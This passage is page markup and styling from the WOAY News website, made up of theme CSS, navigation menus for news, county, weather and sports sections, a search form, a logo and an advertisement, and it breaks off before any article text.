    .tdm_block_column_content:hover .tdm-col-content-title-url .tdm-title,
                .tds-button2 .tdm-btn-text,
                .tds-button2 i,
                .tds-button5:hover .tdm-btn-text,
                .tds-button5:hover i,
                .tds-button6 .tdm-btn-text,
                .tds-button6 i,
                .tdm_block_list .tdm-list-item i,
                .tdm_block_pricing .tdm-pricing-feature i,
                body .tdm-social-item i {
                    color: #dd3333;
                }
                .tds-button1,
                .tds-button6:after,
                .tds-title2 .tdm-title-line:after,
                .tds-title3 .tdm-title-line:after,
                .tdm_block_pricing.tdm-pricing-featured:before,
                .tdm_block_pricing.tds_pricing2_block.tdm-pricing-featured .tdm-pricing-header,
                .tds-progress-bar1 .tdm-progress-bar:after,
                .tds-progress-bar2 .tdm-progress-bar:after,
                .tds-social3 .tdm-social-item {
                    background-color: #dd3333;
                }
                .tds-button2:before,
                .tds-button6:before,
                .tds-progress-bar3 .tdm-progress-bar:after {
                  border-color: #dd3333;
                }
                .tdm-btn-style1 {
					background-color: #dd3333;
				}
				.tdm-btn-style2:before {
				    border-color: #dd3333;
				}
				.tdm-btn-style2 {
				    color: #dd3333;
				}
				.tdm-btn-style3 {
				    -webkit-box-shadow: 0 2px 16px #dd3333;
                    -moz-box-shadow: 0 2px 16px #dd3333;
                    box-shadow: 0 2px 16px #dd3333;
				}
				.tdm-btn-style3:hover {
				    -webkit-box-shadow: 0 4px 26px #dd3333;
                    -moz-box-shadow: 0 4px 26px #dd3333;
                    box-shadow: 0 4px 26px #dd3333;
				}
</style>

	<style id="tdw-css-placeholder">.weather-news a {
  color: white;
}
/*Styling for Video Archive page*/
.page-id-78063 .td-container-wrap {
  background-color: black;
  margin-left: auto;
  margin-right: auto;
}
.page-id-78063 h3 a,
.page-id-78063 .td-excerpt {
  color: #ffffff!important;
}
.page-id-78063 div.td-banner-wrap-full.td-logo-wrap-full.td-container-wrap {
  background-color: white;
}
.page-id-78063 div.td-header-menu-wrap-full.td-container-wrap {
  background-color: white;
}
/*End styling for video archive page*/
</style></head>

<body class="post-template-default single single-post postid-108441 single-format-standard td-standard-pack tsa-prepared-for-winter-holiday-travelers global-block-template-1  tdc-header-template td-full-layout" itemscope="itemscope" itemtype="https://schema.org/WebPage">

            <div class="td-scroll-up  td-hide-scroll-up-on-mob" style="display:none;"><i class="td-icon-menu-up"></i></div>
    
    <div class="td-menu-background" style="visibility:hidden"></div>
<div id="td-mobile-nav" style="visibility:hidden">
    <div class="td-mobile-container">
        <!-- mobile menu top section -->
        <div class="td-menu-socials-wrap">
            <!-- socials -->
            <div class="td-menu-socials">
                
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.facebook.com/woaynewswatch/" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.instagram.com/woaynewswatch/" title="Instagram">
                <i class="td-icon-font td-icon-instagram"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="mailto:news@woay.com" title="Mail">
                <i class="td-icon-font td-icon-mail-1"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://twitter.com/WOAYNewsWatch" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.youtube.com/channel/UCWxMcXSm9GIVIADBYoZ4dxQ" title="Youtube">
                <i class="td-icon-font td-icon-youtube"></i>
            </a>
        </span>            </div>
            <!-- close button -->
            <div class="td-mobile-close">
                <a href="#" aria-label="Close"><i class="td-icon-close-mobile"></i></a>
            </div>
        </div>

        <!-- login section -->
        
        <!-- menu section -->
        <div class="td-mobile-content">
            <div class="menu-main-container"><ul id="menu-main" class="td-mobile-main-menu"><li id="menu-item-107959" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-first menu-item-107959"><a href="https://woay.com/2022-election/">2022 Election<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-107958" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-107958"><a href="https://woay.com/local-election-results-2022/">Local Election Results</a></li>
	<li id="menu-item-107957" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-107957"><a href="https://woay.com/wv-state-election-results-2022/">WV State Election Results</a></li>
	<li id="menu-item-107956" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-107956"><a href="https://woay.com/national-election-results-2022/">National Election Results</a></li>
</ul>
</li>
<li id="menu-item-77747" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-77747"><a href="https://woay.com/">Home</a></li>
<li id="menu-item-39414" class="color-2 menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-item-39414"><a href="https://woay.com/news/">News<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-40309" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-40309"><a href="https://woay.com/news/breaking/">Breaking</a></li>
	<li id="menu-item-39179" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-39179"><a href="https://woay.com/news/crime/">Crime</a></li>
	<li id="menu-item-58733" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-58733"><a href="https://woay.com/news/local/">Local</a></li>
	<li id="menu-item-39185" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-39185"><a href="https://woay.com/news/state/">State</a></li>
	<li id="menu-item-39182" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-39182"><a href="https://woay.com/news/national/">National</a></li>
	<li id="menu-item-65566" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-65566"><a href="https://woay.com/news/virginia-news/">Virginia News</a></li>
	<li id="menu-item-39180" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-39180"><a href="https://woay.com/news/international/">International</a></li>
	<li id="menu-item-39184" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-39184"><a href="https://woay.com/news/politics/">Politics</a></li>
	<li id="menu-item-69554" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-69554"><a href="https://woay.com/news/missing-persons/">Missing Persons</a></li>
	<li id="menu-item-78096" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-78096"><a href="https://woay.com/news/weather/">Weather News</a></li>
	<li id="menu-item-39181" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-39181"><a href="https://woay.com/news/local/">News By County<i class="td-icon-menu-right td-element-after"></i></a>
	<ul class="sub-menu">
		<li id="menu-item-73773" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag menu-item-73773"><a href="https://woay.com/tag/fayette/">Fayette County</a></li>
		<li id="menu-item-81133" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag menu-item-81133"><a href="https://woay.com/tag/greenbrier/">Greenbrier County</a></li>
		<li id="menu-item-57361" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag menu-item-57361"><a href="https://woay.com/tag/raleigh/">Raleigh County</a></li>
		<li id="menu-item-80564" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag menu-item-80564"><a href="https://woay.com/tag/mcdowell-county/">McDowell County</a></li>
		<li id="menu-item-79958" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag menu-item-79958"><a href="https://woay.com/tag/mercer/">Mercer County</a></li>
		<li id="menu-item-70375" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag menu-item-70375"><a href="https://woay.com/tag/monroe/">Monroe County</a></li>
		<li id="menu-item-57366" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag menu-item-57366"><a href="https://woay.com/tag/nicholas/">Nicholas County</a></li>
		<li id="menu-item-70373" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag menu-item-70373"><a href="https://woay.com/tag/summers/">Summers County</a></li>
		<li id="menu-item-80566" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag menu-item-80566"><a href="https://woay.com/tag/tazewell-county/">Tazewell County</a></li>
		<li id="menu-item-80560" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag menu-item-80560"><a href="https://woay.com/tag/wyoming-county/">Wyoming County</a></li>
	</ul>
</li>
</ul>
</li>
<li id="menu-item-81318" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-81318"><a href="https://woay.com/coronavirus/">Coronavirus<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-86285" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-86285"><a href="https://woay.com/covid-19-cases/">COVID-19 Cases</a></li>
</ul>
</li>
<li id="menu-item-39186" class="color-7 menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-39186"><a href="https://woay.com/stormwatch-weather/">Weather<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-61245" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-61245"><a href="https://woay.com/closings-delays/">Closings &#038; Delays</a></li>
</ul>
</li>
<li id="menu-item-39188" class="color-4 menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-39188"><a href="https://woay.com/sports-news/sports/">Sports<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-39190" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-39190"><a href="https://woay.com/sports-news/">Sports News</a></li>
	<li id="menu-item-39189" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-39189"><a href="https://woay.com/sports-news/sports-features/">Sports Features</a></li>
	<li id="menu-item-39192" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-39192"><a href="https://woay.com/sports-news/wvu/">WVU</a></li>
	<li id="menu-item-39193" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-39193"><a href="https://woay.com/sports-news/marshall/">Marshall</a></li>
	<li id="menu-item-39191" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-39191"><a href="https://woay.com/sports-news/virginia-tech/">Virginia Tech</a></li>
</ul>
</li>
<li id="menu-item-78071" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-78071"><a href="https://woay.com/video/">Video<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-88088" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-88088"><a href="https://woay.com/medical-watch/">Medical Watch</a></li>
	<li id="menu-item-78213" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-78213"><a href="https://woay.com/one-tank-trip/">One Tank Trip</a></li>
</ul>
</li>
<li id="menu-item-39195" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-39195"><a href="https://woay.com/tv-guide/">TV Guide</a></li>
<li id="menu-item-39201" class="color-7 menu-item menu-item-type-post_type menu-item-object-page menu-item-39201"><a href="https://woay.com/contact-us/">Contact Us</a></li>
<li id="menu-item-39196" class="color-10 menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-39196"><a>About Us<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-39197" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-39197"><a href="https://woay.com/news-team/">News Team</a></li>
	<li id="menu-item-39198" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-39198"><a href="https://woay.com/advertise-with-us/">Advertise With Us!</a></li>
	<li id="menu-item-39199" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-39199"><a href="https://woay.com/history-of-woay/">History of WOAY</a></li>
	<li id="menu-item-39200" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-39200"><a href="https://woay.com/careers-at-woay/">Careers at WOAY</a></li>
</ul>
</li>
</ul></div>        </div>
    </div>

    <!-- register/login section -->
    </div>    <div class="td-search-background" style="visibility:hidden"></div>
<div class="td-search-wrap-mob" style="visibility:hidden">
	<div class="td-drop-down-search">
		<form method="get" class="td-search-form" action="https://woay.com/">
			<!-- close button -->
			<div class="td-search-close">
				<a href="#"><i class="td-icon-close-mobile"></i></a>
			</div>
			<div role="search" class="td-search-input">
				<span>Search</span>
				<input id="td-header-search-mob" type="text" value="" name="s" autocomplete="off" />
			</div>
		</form>
		<div id="td-aj-search-mob" class="td-ajax-search-flex"></div>
	</div>
</div>

    <div id="td-outer-wrap" class="td-theme-wrap">
    
                    <div class="td-header-template-wrap" style="position: relative">
                                    <div class="td-header-mobile-wrap ">
                        <div id="tdi_1" class="tdc-zone"><div class="tdc_zone tdi_2  wpb_row td-pb-row tdc-element-style"  >
<style scoped>

/* custom css */
.tdi_2{
                    min-height: 0;
                }

/* phone */
@media (max-width: 767px){
.tdi_2:before{
                    content: '';
                    display: block;
                    width: 100vw;
                    height: 100%;
                    position: absolute;
                    left: 50%;
                    transform: translateX(-50%);
                    box-shadow:  0px 6px 8px 0px rgba(0, 0, 0, 0.08);
                    z-index: 20;
                    pointer-events: none;
                }@media (max-width: 767px) {
                    .tdi_2:before {
                        width: 100%;
                    }
                }
}
/* inline tdc_css att */

/* phone */
@media (max-width: 767px)
{
.tdi_2{
position:relative;
}
}

</style>
<div class="tdi_1_rand_style td-element-style" ><style>
/* phone */
@media (max-width: 767px)
{
.tdi_1_rand_style{
background-color:#222222 !important;
}
}
 </style></div><div id="tdi_3" class="tdc-row"><div class="vc_row tdi_4  wpb_row td-pb-row" >
<style scoped>

/* custom css */
.tdi_4,
                .tdi_4 .tdc-columns{
                    min-height: 0;
                }.tdi_4,
				.tdi_4 .tdc-columns{
				    display: block;
				}.tdi_4 .tdc-columns{
				    width: 100%;
				}

/* phone */
@media (max-width: 767px){
@media (min-width: 768px) {
	                .tdi_4 {
	                    margin-left: -0px;
	                    margin-right: -0px;
	                }
	                .tdi_4 .tdc-row-video-background-error,
	                .tdi_4 .vc_column {
	                    padding-left: 0px;
	                    padding-right: 0px;
	                }
                }
}
</style><div class="vc_column tdi_6  wpb_column vc_column_container tdc-column td-pb-span4">
<style scoped>

/* custom css */
.tdi_6{
                    vertical-align: baseline;
                }.tdi_6 > .wpb_wrapper,
				.tdi_6 > .wpb_wrapper > .tdc-elements{
				    display: block;
				}.tdi_6 > .wpb_wrapper > .tdc-elements{
				    width: 100%;
				}.tdi_6 > .wpb_wrapper > .vc_row_inner{
				    width: auto;
				}.tdi_6 > .wpb_wrapper{
				    width: auto;
				    height: auto;
				}

/* phone */
@media (max-width: 767px){
.tdi_6{
                    vertical-align: middle;
                }
}
/* inline tdc_css att */

/* phone */
@media (max-width: 767px)
{
.tdi_6{
width:20% !important;
display:inline-block !important;
}
}

</style><div class="wpb_wrapper"><div class="td_block_wrap tdb_mobile_menu tdi_7 td-pb-border-top td_block_template_1 tdb-header-align"  data-td-block-uid="tdi_7" >
<style>

/* inline tdc_css att */

/* phone */
@media (max-width: 767px)
{
.tdi_7{
margin-top:2px !important;
margin-left:-13px !important;
}
}

</style>
<style>
/* custom css */
.tdb-header-align{
                  vertical-align: middle;
                }.tdb_mobile_menu{
                  margin-bottom: 0;
                  clear: none;
                }.tdb_mobile_menu a{
                  display: inline-block !important;
                  position: relative;
                  text-align: center;
                  color: #4db2ec;
                }.tdb_mobile_menu a > span{
                  display: flex;
                  align-items: center;
                  justify-content: center;
                }.tdb_mobile_menu svg{
                  height: auto;
                }.tdb_mobile_menu svg,
                .tdb_mobile_menu svg *{
                  fill: #4db2ec;
                }#tdc-live-iframe .tdb_mobile_menu a{
                  pointer-events: none;
                }.tdi_7{
                    display: inline-block;
                }.tdi_7 .tdb-mobile-menu-button i{
                    font-size: 22px;
                
                    width: 55px;
					height: 55px;
					line-height:  55px;
                }.tdi_7 .tdb-mobile-menu-button svg{
                    width: 22px;
                }.tdi_7 .tdb-mobile-menu-button .tdb-mobile-menu-icon-svg{
                    width: 55px;
					height: 55px;
                }.tdi_7 .tdb-mobile-menu-button{
                    color: #ffffff;
                }.tdi_7 .tdb-mobile-menu-button svg,
                .tdi_7 .tdb-mobile-menu-button svg *{
                    fill: #ffffff;
                }

/* phone */
@media (max-width: 767px){
.tdi_7 .tdb-mobile-menu-button i{
                    font-size: 27px;
                
                    width: 54px;
					height: 54px;
					line-height:  54px;
                }.tdi_7 .tdb-mobile-menu-button svg{
                    width: 27px;
                }.tdi_7 .tdb-mobile-menu-button .tdb-mobile-menu-icon-svg{
                    width: 54px;
					height: 54px;
                }
}
</style><div class="tdb-block-inner td-fix-index"><a class="tdb-mobile-menu-button" aria-label="menu-button" href="#"><i class="tdb-mobile-menu-icon td-icon-mobile"></i></a></div></div> <!-- ./block --></div></div><div class="vc_column tdi_9  wpb_column vc_column_container tdc-column td-pb-span4">
<style scoped>

/* custom css */
.tdi_9{
                    vertical-align: baseline;
                }.tdi_9 > .wpb_wrapper,
				.tdi_9 > .wpb_wrapper > .tdc-elements{
				    display: block;
				}.tdi_9 > .wpb_wrapper > .tdc-elements{
				    width: 100%;
				}.tdi_9 > .wpb_wrapper > .vc_row_inner{
				    width: auto;
				}.tdi_9 > .wpb_wrapper{
				    width: auto;
				    height: auto;
				}

/* phone */
@media (max-width: 767px){
.tdi_9{
                    vertical-align: middle;
                }
}
/* inline tdc_css att */

/* phone */
@media (max-width: 767px)
{
.tdi_9{
width:60% !important;
display:inline-block !important;
}
}

</style><div class="wpb_wrapper"><div class="td_block_wrap tdb_header_logo tdi_10 td-pb-border-top td_block_template_1 tdb-header-align"  data-td-block-uid="tdi_10" >
<style>

/* inline tdc_css att */

/* phone */
@media (max-width: 767px)
{
.tdi_10{
margin-top:-8px !important;
}
}

</style>
<style>
/* custom css */
.tdb_header_logo{
                  margin-bottom: 0;
                  clear: none;
                }.tdb_header_logo .tdb-logo-a,
                .tdb_header_logo h1{
                  display: flex;
                  pointer-events: auto;
                  align-items: flex-start;
                }.tdb_header_logo h1{
                  margin: 0;
                  line-height: 0;
                }.tdb_header_logo .tdb-logo-img-wrap img{
                  display: block;
                }.tdb_header_logo .tdb-logo-svg-wrap + .tdb-logo-img-wrap{
                  display: none;
                }.tdb_header_logo .tdb-logo-svg-wrap svg{
                  width: 50px;
                  display: block;
                  transition: fill .3s ease;
                }.tdb_header_logo .tdb-logo-text-wrap{
                  display: flex;
                }.tdb_header_logo .tdb-logo-text-title,
                .tdb_header_logo .tdb-logo-text-tagline{
                  -webkit-transition: all 0.2s ease;
                  transition: all 0.2s ease;
                }.tdb_header_logo .tdb-logo-text-title{
                  background-size: cover;
                  background-position: center center;
                  font-size: 75px;
                  font-family: serif;
                  line-height: 1.1;
                  color: #222;
                  white-space: nowrap;
                }.tdb_header_logo .tdb-logo-text-tagline{
                  margin-top: 2px;
                  font-size: 12px;
                  font-family: serif;
                  letter-spacing: 1.8px;
                  line-height: 1;
                  color: #767676;
                }.tdb_header_logo .tdb-logo-icon{
                  position: relative;
                  font-size: 46px;
                  color: #000;
                }.tdb_header_logo .tdb-logo-icon-svg{
                  line-height: 0;
                }.tdb_header_logo .tdb-logo-icon-svg svg{
                  width: 46px;
                  height: auto;
                }.tdb_header_logo .tdb-logo-icon-svg svg,
                .tdb_header_logo .tdb-logo-icon-svg svg *{
                  fill: #000;
                }.tdi_10 .tdb-logo-a,
                .tdi_10 h1{
                    flex-direction: row;
                
                    align-items: center;
                
                    justify-content: center;
                }.tdi_10 .tdb-logo-svg-wrap{
                    display: block;
                }.tdi_10 .tdb-logo-img-wrap{
                    display: none;
                }.tdi_10 .tdb-logo-text-tagline{
                    margin-top: -3px;
                    margin-left: 0;
                
                    display: block;
                }.tdi_10 .tdb-logo-text-title{
                    display: block;
                
                    color: #ffffff;
                }.tdi_10 .tdb-logo-text-wrap{
                    flex-direction: column;
                
                    align-items: center;
                }.tdi_10 .tdb-logo-icon{
                    top: 0px;
                
                    display: block;
                }@media (max-width: 767px) {
                  .tdb_header_logo .tdb-logo-text-title {
                    font-size: 36px;
                  }
                }@media (max-width: 767px) {
                  .tdb_header_logo .tdb-logo-text-tagline {
                    font-size: 11px;
                  }
                }

/* portrait */
@media (min-width: 768px) and (max-width: 1018px){
.tdi_10 .tdb-logo-img{
                    max-width: 186px;
                }.tdi_10 .tdb-logo-text-tagline{
                    margin-top: -2px;
                    margin-left: 0;
                }
}

/* phone */
@media (max-width: 767px){
.tdi_10 .tdb-logo-svg-wrap + .tdb-logo-img-wrap{
                    display: none;
                }.tdi_10 .tdb-logo-img{
                    max-width: 180px;
                }.tdi_10 .tdb-logo-img-wrap{
                    display: block;
                }
}
</style><div class="tdb-block-inner td-fix-index"><a class="tdb-logo-a" href="https://woay.com/"><span class="tdb-logo-img-wrap"><img class="tdb-logo-img td-retina-data" data-retina="https://woay.com/wp-content/uploads/2020/03/WOAY-972-X-333.png" src="https://woay.com/wp-content/uploads/2020/03/WOAY-272-X-90.png" alt="WOAY News"  title="WOAY News"  /></span></a></div></div> <!-- ./block --></div></div><div class="vc_column tdi_12  wpb_column vc_column_container tdc-column td-pb-span4">
<style scoped>

/* custom css */
.tdi_12{
                    vertical-align: baseline;
                }.tdi_12 > .wpb_wrapper,
				.tdi_12 > .wpb_wrapper > .tdc-elements{
				    display: block;
				}.tdi_12 > .wpb_wrapper > .tdc-elements{
				    width: 100%;
				}.tdi_12 > .wpb_wrapper > .vc_row_inner{
				    width: auto;
				}.tdi_12 > .wpb_wrapper{
				    width: auto;
				    height: auto;
				}

/* phone */
@media (max-width: 767px){
.tdi_12{
                    vertical-align: middle;
                }
}
/* inline tdc_css att */

/* phone */
@media (max-width: 767px)
{
.tdi_12{
width:20% !important;
display:inline-block !important;
}
}

</style><div class="wpb_wrapper"><div class="td_block_wrap tdb_mobile_search tdi_13 td-pb-border-top td_block_template_1 tdb-header-align"  data-td-block-uid="tdi_13" >
<style>

/* inline tdc_css att */

/* phone */
@media (max-width: 767px)
{
.tdi_13{
margin-right:-18px !important;
margin-bottom:0px !important;
}
}

</style>
<style>
/* custom css */
.tdb_mobile_search{
                  margin-bottom: 0;
                  clear: none;
                }.tdb_mobile_search a{
                  display: inline-block !important;
                  position: relative;
                  text-align: center;
                  color: #4db2ec;
                }.tdb_mobile_search a > span{
                  display: flex;
                  align-items: center;
                  justify-content: center;
                }.tdb_mobile_search svg{
                  height: auto;
                }.tdb_mobile_search svg,
                .tdb_mobile_search svg *{
                  fill: #4db2ec;
                }#tdc-live-iframe .tdb_mobile_search a{
                  pointer-events: none;
                }.tdi_13{
                    display: inline-block;
                
                    float: right;
                    clear: none;
                }.tdi_13 .tdb-header-search-button-mob i{
                    font-size: 22px;
                
                    width: 55px;
					height: 55px;
					line-height:  55px;
                }.tdi_13 .tdb-header-search-button-mob svg{
                    width: 22px;
                }.tdi_13 .tdb-header-search-button-mob .tdb-mobile-search-icon-svg{
                    width: 55px;
					height: 55px;
					display: flex;
                    justify-content: center;
                }.tdi_13 .tdb-header-search-button-mob{
                    color: #ffffff;
                }.tdi_13 .tdb-header-search-button-mob svg,
                .tdi_13 .tdb-header-search-button-mob svg *{
                    fill: #ffffff;
                }
</style><div class="tdb-block-inner td-fix-index"><a class="tdb-header-search-button-mob dropdown-toggle" href="#" role="button" aria-label="Search" data-toggle="dropdown"><span class="tdb-mobile-search-icon tdb-mobile-search-icon-svg" ><svg version="1.1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1024 1024"><path d="M946.371 843.601l-125.379-125.44c43.643-65.925 65.495-142.1 65.475-218.040 0.051-101.069-38.676-202.588-115.835-279.706-77.117-77.148-178.606-115.948-279.644-115.886-101.079-0.061-202.557 38.738-279.665 115.876-77.169 77.128-115.937 178.627-115.907 279.716-0.031 101.069 38.728 202.588 115.907 279.665 77.117 77.117 178.616 115.825 279.665 115.804 75.94 0.020 152.136-21.862 218.061-65.495l125.348 125.46c30.915 30.904 81.029 30.904 111.954 0.020 30.915-30.935 30.915-81.029 0.020-111.974zM705.772 714.925c-59.443 59.341-136.899 88.842-214.784 88.924-77.896-0.082-155.341-29.583-214.784-88.924-59.443-59.484-88.975-136.919-89.037-214.804 0.061-77.885 29.604-155.372 89.037-214.825 59.464-59.443 136.878-88.945 214.784-89.016 77.865 0.082 155.3 29.583 214.784 89.016 59.361 59.464 88.914 136.919 88.945 214.825-0.041 77.885-29.583 155.361-88.945 214.804z"></path></svg></span></a></div></div> <!-- ./block --></div></div></div></div><div id="tdi_14" class="tdc-row"><div class="vc_row tdi_15  wpb_row td-pb-row" >
<style scoped>

/* custom css */
.tdi_15,
                .tdi_15 .tdc-columns{
                    min-height: 0;
                }.tdi_15,
				.tdi_15 .tdc-columns{
				    display: block;
				}.tdi_15 .tdc-columns{
				    width: 100%;
				}
</style><div class="vc_column tdi_17  wpb_column vc_column_container tdc-column td-pb-span12">
<style scoped>

/* custom css */
.tdi_17{
                    vertical-align: baseline;
                }.tdi_17 > .wpb_wrapper,
				.tdi_17 > .wpb_wrapper > .tdc-elements{
				    display: block;
				}.tdi_17 > .wpb_wrapper > .tdc-elements{
				    width: 100%;
				}.tdi_17 > .wpb_wrapper > .vc_row_inner{
				    width: auto;
				}.tdi_17 > .wpb_wrapper{
				    width: auto;
				    height: auto;
				}
</style><div class="wpb_wrapper"><div class="td-a-rec td-a-rec-id-header  tdi_18 td_block_template_1">
<style>
/* custom css */
.tdi_18.td-a-rec{
					text-align: center;
				}.tdi_18 .td-element-style{
					z-index: -1;
				}.tdi_18.td-a-rec-img{
				    text-align: left;
				}.tdi_18.td-a-rec-img img{
                    margin: 0 auto 0 0;
                }@media (max-width: 767px) {
				    .tdi_18.td-a-rec-img {
				        text-align: center;
				    }
                }
</style><span class="td-adspot-title">- Advertisement -</span><div class="g g-2"><div class="g-single a-39"><a class="gofollow" data-track="MzksMiwxLDYw" href="https://wvlottery.com/customer-service/find-a-retailer/?utm_source=tv&utm_medium=digitalad&utm_campaign=TinyHomes22&utm_term=find+a+retailer&utm_content=728x90"><img src="https://i0.wp.com/woay.com/wp-content/uploads/2022/09/unnamed.jpg?ssl=1" /></a></div></div></div><div class="wpb_wrapper td_block_empty_space td_block_wrap vc_empty_space tdi_20 "  style="height: 32px"></div></div></div></div></div></div></div>                    </div>
                                    <div class="td-header-mobile-sticky-wrap tdc-zone-sticky-invisible tdc-zone-sticky-inactive" style="display: none">
                        <div id="tdi_21" class="tdc-zone"><div class="tdc_zone tdi_22  wpb_row td-pb-row" data-sticky-offset="0" >
<style scoped>

/* custom css */
.tdi_22{
                    min-height: 0;
                }.td-header-mobile-sticky-wrap.td-header-active{
                    opacity: 1;
                }
</style><div id="tdi_23" class="tdc-row"><div class="vc_row tdi_24  wpb_row td-pb-row" >
<style scoped>

/* custom css */
.tdi_24,
                .tdi_24 .tdc-columns{
                    min-height: 0;
                }.tdi_24,
				.tdi_24 .tdc-columns{
				    display: block;
				}.tdi_24 .tdc-columns{
				    width: 100%;
				}
</style><div class="vc_column tdi_26  wpb_column vc_column_container tdc-column td-pb-span12">
<style scoped>

/* custom css */
.tdi_26{
                    vertical-align: baseline;
                }.tdi_26 > .wpb_wrapper,
				.tdi_26 > .wpb_wrapper > .tdc-elements{
				    display: block;
				}.tdi_26 > .wpb_wrapper > .tdc-elements{
				    width: 100%;
				}.tdi_26 > .wpb_wrapper > .vc_row_inner{
				    width: auto;
				}.tdi_26 > .wpb_wrapper{
				    width: auto;
				    height: auto;
				}
</style><div class="wpb_wrapper"></div></div></div></div></div></div>                    </div>
                
                    <div class="td-header-desktop-wrap ">
                        <div id="tdi_27" class="tdc-zone"><div class="tdc_zone tdi_28  wpb_row td-pb-row tdc-element-style"  >
<style scoped>

/* custom css */
.tdi_28{
                    min-height: 0;
                }.tdi_28:before{
                    content: '';
                    display: block;
                    width: 100vw;
                    height: 100%;
                    position: absolute;
                    left: 50%;
                    transform: translateX(-50%);
                    box-shadow:  0px 6px 8px 0px rgba(0, 0, 0, 0.08);
                    z-index: 20;
                    pointer-events: none;
                }.td-header-desktop-wrap{
                    position: relative;
                }@media (max-width: 767px) {
                    .tdi_28:before {
                        width: 100%;
                    }
                }
/* inline tdc_css att */

.tdi_28{
position:relative;
}

</style>
<div class="tdi_27_rand_style td-element-style" ><style>
.tdi_27_rand_style{
background-color:#ffffff !important;
}
 </style></div><div id="tdi_29" class="tdc-row"><div class="vc_row tdi_30  wpb_row td-pb-row" >
<style scoped>

/* custom css */
.tdi_30,
                .tdi_30 .tdc-columns{
                    min-height: 0;
                }.tdi_30,
				.tdi_30 .tdc-columns{
				    display: block;
				}.tdi_30 .tdc-columns{
				    width: 100%;
				}
</style><div class="vc_column tdi_32  wpb_column vc_column_container tdc-column td-pb-span12">
<style scoped>

/* custom css */
.tdi_32{
                    vertical-align: baseline;
                }.tdi_32 > .wpb_wrapper,
				.tdi_32 > .wpb_wrapper > .tdc-elements{
				    display: block;
				}.tdi_32 > .wpb_wrapper > .tdc-elements{
				    width: 100%;
				}.tdi_32 > .wpb_wrapper > .vc_row_inner{
				    width: auto;
				}.tdi_32 > .wpb_wrapper{
				    width: auto;
				    height: auto;
				}
</style><div class="wpb_wrapper"><div class="vc_row_inner tdi_34  vc_row vc_inner wpb_row td-pb-row tdc-row-content-vert-center" >
<style scoped>

/* custom css */
.tdi_34{
                    position: relative !important;
                    top: 0;
                    transform: none;
                    -webkit-transform: none;
                }.tdi_34,
				.tdi_34 .tdc-inner-columns{
				    display: block;
				}.tdi_34 .tdc-inner-columns{
				    width: 100%;
				}@media (min-width: 768px) {
	                .tdi_34 {
	                    margin-left: -0px;
	                    margin-right: -0px;
	                }
	                .tdi_34 .vc_column_inner {
	                    padding-left: 0px;
	                    padding-right: 0px;
	                }
                }@media (min-width: 767px) {
                    .tdi_34.tdc-row-content-vert-center,
                    .tdi_34.tdc-row-content-vert-center .tdc-inner-columns {
                        display: flex;
                        align-items: center;
                        flex: 1;
